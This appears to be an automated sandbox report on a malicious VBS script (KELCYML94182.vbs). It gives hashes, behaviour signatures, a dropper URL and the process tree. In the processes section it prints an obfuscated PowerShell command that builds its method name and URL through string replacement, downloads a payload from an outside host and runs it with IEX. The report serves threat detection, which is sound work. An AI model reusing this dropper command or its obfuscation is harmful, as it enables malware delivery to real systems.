Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
26-02-2022 23:48
Static task
static1
Behavioral task
behavioral1
Sample
KELCYML94182.vbs
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
KELCYML94182.vbs
Resource
win10-20220223-en
windows10_x64
0 signatures
0 seconds
General
-
Target
KELCYML94182.vbs
-
Size
820B
-
MD5
876924f6b4fe731b83fdd100bbf26cc2
-
SHA1
411d8886c79f7acfb50663234b67f22f5bc48cdd
-
SHA256
7ce24a33f4c22348ea1da16e5d04ac7936b8488a48371673343754e586069faf
-
SHA512
f0173ca14f0066a458946484cd2be6126c70ac3ce1c221d3265e76b89dc38ae9285732539a97315664c20c199403f7bd9135b05f136f030bbdf8a090c690c543
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://sikabid.com/.Final2.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 564 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 564 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 576 wrote to memory of 564 576 WScript.exe powershell.exe PID 576 wrote to memory of 564 576 WScript.exe powershell.exe PID 576 wrote to memory of 564 576 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KELCYML94182.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'h+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','ttps://sikab').Replace('################','id.com/.Final2.txt'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/564-57-0x000007FEF2B30000-0x000007FEF368D000-memory.dmpFilesize
11.4MB
-
memory/564-58-0x000007FEF525E000-0x000007FEF525F000-memory.dmpFilesize
4KB
-
memory/564-59-0x0000000002640000-0x0000000002642000-memory.dmpFilesize
8KB
-
memory/564-61-0x0000000002644000-0x0000000002647000-memory.dmpFilesize
12KB
-
memory/564-60-0x0000000002642000-0x0000000002644000-memory.dmpFilesize
8KB
-
memory/564-62-0x000000001B7E0000-0x000000001BADF000-memory.dmpFilesize
3.0MB
-
memory/564-63-0x000000000264B000-0x000000000266A000-memory.dmpFilesize
124KB
-
memory/576-55-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmpFilesize
8KB